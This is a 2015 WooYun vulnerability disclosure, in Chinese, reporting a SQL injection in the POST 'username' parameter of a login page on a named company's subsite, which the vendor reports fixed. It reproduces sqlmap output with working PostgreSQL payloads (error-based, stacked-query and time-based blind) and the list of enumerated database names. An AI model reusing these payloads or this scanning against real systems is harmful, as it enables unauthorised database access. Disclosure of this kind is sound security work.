当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121668

漏洞标题:新空气某分站一处废弃系统存在注入

相关厂商:北京新空气软件技术有限公司

漏洞作者:

提交时间:2015-06-22 21:45

修复时间:2015-06-26 10:06

公开时间:2015-06-26 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-22: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-06-26: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

**

详细说明:

貌似是一处废弃的系统:
http://flow.funguide.com.cn:8080/maguscback/
存在post注入

sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: POST
Parameter: username
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=TQtq' AND 9980=CAST((CHR(58)||CHR(100)||CHR(97)||CHR(100)|
|CHR(58))||(SELECT (CASE WHEN (9980=9980) THEN 1 ELSE 0 END))::text||(CHR(58)||C
HR(112)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'VFFu'='VFFu&pass=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: username=TQtq'; SELECT PG_SLEEP(5)--&pass=
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=TQtq' AND 4058=(SELECT 4058 FROM PG_SLEEP(5)) AND 'Uqqj'='
Uqqj&pass=
---
do you want to exploit this SQL injection? [Y/n] n
[19:00:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times
[19:00:08] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'D:\Python27\sqlmap\output\results-06192015_0658pm.csv'
[*] shutting down at 19:00:08


数据库信息:

available databases [6]:
[*] magus
[*] magusc
[*] postgres
[*] rdsadmin
[*] template0
[*] template1


PostgreSQL玩不转啊..

漏洞证明:

RT

修复方案:

**

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-23 09:31

厂商回复:

感谢

最新状态:

2015-06-26:已经对修复漏洞